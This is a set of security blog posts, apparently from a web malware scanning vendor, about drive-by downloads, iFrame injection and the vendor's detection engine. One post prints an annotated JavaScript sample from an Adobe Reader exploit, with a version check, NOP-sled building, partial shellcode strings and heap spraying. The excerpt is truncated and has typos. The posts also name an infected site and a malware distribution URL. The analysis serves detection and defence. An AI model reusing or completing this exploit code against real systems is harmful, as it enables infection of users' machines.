BY DAVID HARLEY Senior Research Fellow
[Another fascinating Blackhole development noted by Aleksandr Matrosov]
This week we have detected another interesting attack vector. This time cybercriminals are using an interesting technique for hiding malicious Javascripts and use implicit iFrame injection. At this moment we are tracking hundreds of infected legitimate web sites in the Russian internet segment using this technique of infection. Let’s analyze this attack method step by step.
If we look at the code on an infected webpage, we can find only one javascript file reference. No malicious iFrame is visible in the source code of infected webpage. In the next stage of our analysis we downloaded this javascript code from one of the infected sites (hxxp://winfield-oil.ru/javascript/script.js) for further analysis….
See full analysis at http://blog.eset.com/2012/04/05/blackhole-exploit-kit-plays-with-smart-redirection
There is no doubt that a web-based malware is an emerging security threat for websites and web users. The social networks and dynamic content has increased the delivery of sophisticated web threats that evade detection by traditional signature and pattern based security technologies.
Hackers install malware on popular web sites by exploiting security weaknesses on their servers and thus gaining full access to the compromised web site. In most cases the malicious code is not visible or easily detected, and it infects computers of web site visitors when they simply browse this web site.
This is one of the main approaches used by hackers to spread viruses, hijack Internet devices or steal sensitive data such as credit card numbers or other personal information. As such, hackers are planting a malicious code on legitimate websites in order to distribute malware among the web site visitors and infect as much as possible. These attacks can take several forms, including “drive-by-downloads” and “dangerous downloads”.
In a “drive-by-download” attack, a malware is downloaded to user’s computer, simply by loading an infected web page in a browser; no interaction on the user side other than loading the web page is required to accomplish the attack.
In a “dangerous download” attack, hackers plant malicious files such as executables, documents, images, that contain malicious code on a legitimate, victim web site, and users get infected when they click on links to the malicious files.
Once a malware infects users’ computer, the hackers can monitor those compromised devices in a various ways, including: logging users’ keystrokes, using the compromised computer to send spam, converting it to become a part of a bot, distribute more malware or simply modify search results provided by search engines like Google, Bing and Yahoo.
” if a user searched for the websites of major institutions like iTunes, Netflix or the IRS, the search results would return normally. However, if the user tried to click on the link to the websites, the malware on the computer would force a redirect to a different website where the criminals would profit in their advertisement deal…, when an infected computer visited a major website — like Amazon.com — the malware would be able to simply replace regular advertisements on that page with advertisements of their own making” [1].
A malicious code that hackers inject into websites is called web-based malware. This code is different from the malware itself that might infect user’s computers. Web-based malware targets web browser and works by embedding in, sourcing in, or redirecting to malicious content located on a hacker’s website or an infected legitimate website.
Web-based malware can be found in HTML, Javascript, Dynamic HTML, AJAX, Flash, PDF, or a variety of other programming languages and formats. On the contrary, a PC-based malware often takes the form of an executable file that runs malicious code directly on the computer’s microprocessor as opposed to being interpreted by the web browser.
Nowadays, attackers use web-based malware to infect web pages so that those web pages can serve as distribution points for traditional, PC-based malware.
A typical sequence of events is as follows: first thing user visits a web page infected with web-based malware and then, as a result, gets a malware downloaded to his or her computer.
How legitimate web-sites turn into dangerous
There are many different ways and technologies used by hackers to inject malicious content into legitimate and popular web sites, here are few of them:
Sourcing in malicious content – web sites often source in content from third-party widgets or mash-ups.
If you use a third-party widgets or mash-ups on your web site and any of those third-party content providers gets infected, then your website can also get infected as a result.
Compromised FTP credentials – hackers can compromise websites using stolen administrative credentials or exploiting server vulnerability and placing malicious code on to the site.
Malicious advertisements (“malvertising”) – content publishers and ad networks have become victims of malvertising, where attackers create a malicious advertisement and inject it into a legitimate ad network. The malicious ad is served to users during normal ad rotation on a publisher site. The result is a malware being downloaded to consumers’ computers who are viewing the ad.
User generated content – attackers can upload malicious HTML, files (such as images or documents), or links to any website that accepts submissions from visitors. This includes blog comments, product feedbacks and ratings, or any other user-generated content.
Vulnerabilities in web applications – hackers can exploit the vulnerabilities in common web software packages to inject malicious code into websites.
Vulnerabilities in the network – network vulnerabilities can be exploited to gain access to web servers and infect all of the websites hosted on those servers.
The nature of “drive-by-download” attack
“Drive-by-download”, basically, means injection of malicious executable instructions into compromised interned device and which results in installation of malicious program. The “drive-by-download” method is one of the major channels for malware distribution and injection of malicious processes.
In general, “drive-by-download” attack targets certain kind of victim application and certain version of this application and comprises exploitation of one or more of security weaknesses or security vulnerabilities in order to inject malicious code into memory space of the attacked process.
The malicious code injection phase could be divided into few logical steps that take place in JavaScript code performing the attack:
1 – Preparation of memory layout of the attacked program (web browser or PDF reader)
2 – Generation of the malicious code that will be injected into the memory of the compromised program
3 – Exploitation of security vulnerability found in the targeted program
4 – Injection of the generated malicious code
5 – Taking control of the execution of the compromised program and installation of the malicious programs into compromised internet device.
Steps 1 through 4, in most cases, are implemented in high level programing language and are differ/change from attack to attack in order to avoid detection by signature and pattern based rules.
One of major techniques to overcome signature based detection approach is JavaScript code obfuscation which means that generation of procedures executed in steps 1-4 are, actually, done by the compromised program itself. Due to nature of high level programing languages, the same algorithms could be programed in lots of different ways and thus easily overcome traditional protection mechanisms.
Quttera infrastructure technology and benefits
In order to improve existing identification capabilities we have developed a heuristic non-signature based detection infrastructure which is capable to detect and protect from various kinds of web-threats. Quttera malicious content detection engine comprises multiple non-signature based investigation and analytic methods. Quttera engine is capable to identify JavaScript based attacks and security vulnerability exploits. On top of that, Quttera engine detects JavaScript obfuscation techniques and JavaScript packers which are used to hide malicious content and dangerous code from signature and pattern based identification mechanisms.
Quttera investigation infrastructure embeds several execution emulators which are not only emulate execution of the targeted device but also penetrate the investigated content and detect web-treats regardless to targeted web browser or operating system or internet device.
Quttera investigation engine includes three main modules:
X86 emulator – emulation and detection of shellcodes and sensible malicious sequences of executable instructions
JavaScript emulator – emulation and detection of malicious JavaScript scripts and HTML pages and
PDF reader emulator – detection of malicious PDF files.
Based on this architecture, Quttera investigation engine is capable to recognize and detect:
Security vulnerability exploits referencing system internals ( x86 architecture)
Security vulnerability exploits referencing process internals(x86 architecture)
Sensible sequences of CPU instructions inside text and binary files(x86 architecture)
Hidden Java-script code which is being generated during emulation of the original script or web page
Suspicious Java-script containing code obfuscation or injection of hidden Java-script
Hidden HTML elements generated during emulation of the original script or web page
PDF files containing embedded malicious PE files, hidden suspicious actions, hidden suspicious elements and Java-script code obfuscation
Malformed PDF files
Encrypted PDF files
Quttera infrastructure is designed and implemented as a generic investigation engine and can be adopted and integrated into various information security software like:
Intrusion detection/prevention systems (IDS/IPS)
Antiviruses and malware detection tools
Malicious and suspicious web sites detection systems
Web sites investigation systems
Security Internet suits
Application gateways
Mail servers
Summary
Number of attacked and compromised web sites is increasing from day to day and has become the most popular attack vector among the bad guys. Gaining the speed it brings damage to unsuspected users and harms the reputation of the well-known web sites. Malicious code injection and malicious code obfuscation techniques improve themselves daily and overcome traditional signature based approach. It all boils down to be too difficult to distinguish between clean and compromised web sites.
Quttera infrastructure represents unique capabilities to detect auto-generated malicious web content, JavaScript code obfuscation and prevent web site visitors from being infected by injected malicious content.
For more information please visit our web site at http://quttera.com
The “drive by download” method is one of the major channels for malware distribution and injection of malicious processes. In this post we’ll try to cover an anatomy of the JavaScript code sample which is used to:
1.-Attack Adobe Reader process
2.-Inject malicious CPU code
and finally…
3.-Launch the malicious program.
In general, drive-by-download attack targets certain kind of victim application and certain version of this application. It comprises exploitation of one or more of security weaknesses or security vulnerabilities in order to inject malicious code into memory space of the attacked process.
The malicious code injection phase could be divided into few logical steps that take place in JavaScript code performing the attack:
I) generate binary NOP ( no operation ) sled that will catch jump of the instruction pointer (IP) during exploit execution
II) populate memory address space of the victim process with the generated NOP sled
III) generate binary shellcode or malicious code that will receive control on CPU instructions after execution of the NOP sled
IV) invoke vulnerability exploit and pass execution control to the generated NOP sled.
As an example we use discovered drive-by-download sample targeting Adobe Reader from version 7.0 and till version 9.4. Execution of this sample on other versions will enter the program into infinite loop upon execution of “while(1);” statement. We changed original names of variables to make this code readable and
understandable.
/********************************************************************************************
this is main function used to recognize Adobe Reader version and select which exploit
to execute aaaaa() or bbbbb() which are depends on reader’s version
********************************************************************************************/
function dddd()
{
ver = app.viewerVersion //retrieves reader version
if(ver < 9.4)
{ //if version is greater then 9.4 enter infinite loop (stick process)
while(1);
}
else if (ver <=9 ) //for versions between 9.0 and 9.4
{
aaaaa();
var cWord = this.getPageNthWord(2, 0);
this.selectPageNthWord(2 , 0);
}
else if (ver >=8) //for versions between 8.0 and 9.0
{
bbbbb();
var cWord = this.getPageNthWord(5, 0);
this.selectPageNthWord(5 , 0);
}
else if (ver >=7) //for versions 7.0 and 8.0
{
bbbbb();
var cWord = this.getPageNthWord(8, 0);
this.selectPageNthWord(8 , 0);
}
else
{ // stick process if reader version less then 7
while(1);
}
}
function aaaaa()
{
var u1=unescape
var payload1;
/***************************************************************************************
builds long NOP sled from ‘x’ characters which is translated to “Jump short if sign” x86 instrcution
****************************************************************************************/
for(i=0;i<28002;i++) payload1+=0×78;
var u2 = u1;
var payload1 = u2( “\x25\x754141\x25\x754141%u63a5%u4a80…..”+
/************************************************
this is actually code of the injected binary malware
************************************************/
/**************************************************************
builds NOP sled to spray into the process memory
**************************************************************/
var arr1 = new Array();
ffor (index=0;index<0×200;index++) { arr1[index]=nop3+”s”; }
}
function bbbbb()
{
var u1=unescape
var payload1;
/***************************************************************************************
builds long NOP sled from ‘x’ characters which is translated to “Jump short if sign” x86 instrcution
****************************************************************************************/
for(i=0;i<28002;i++) payload1+=0×78;
var u2 =u1;
var payload1 = u2(“\u4141\u4141\u4141\u4141\u4141\u4141\u17f2\u4a82\u5000\u4a84\u630f\u4a80″+
/************************************************
this is actually code of the injected binary malware
************************************************/
/**************************************************************
builds NOP sled to spray into the process memory
**************************************************************/
var nop = u2(“\x25\x750c0c\x25\x750c0c”);
while (nop.length + 20 + 8 < 65536)
nop+=nop;
/************************************
script entry point
************************************/
dddd();
Hesitate whether your web site is clean from suspicious JavaScript code or not?
Scan it for free with our web investigation service at quttera.com
Your feedback is appreciated.
For more articles visit our articles page at www.quttera.com/articles.
Once again we meet the same obfuscation pattern previously use in mysql.com attack.
This is the main body of the script.
Which is finally translated into the following code, which injects hidden iframe that redirects user
to http://1nvesttsmenttsclybs.info URL known as distributing Trojan.
Hesitate whether your web site is clean from suspicious JavaScript code or not?
Scan it for free with our web investigation service at quttera.com
Your feedback is appreciated.
For more articles visit our articles page at www.quttera.com/articles.
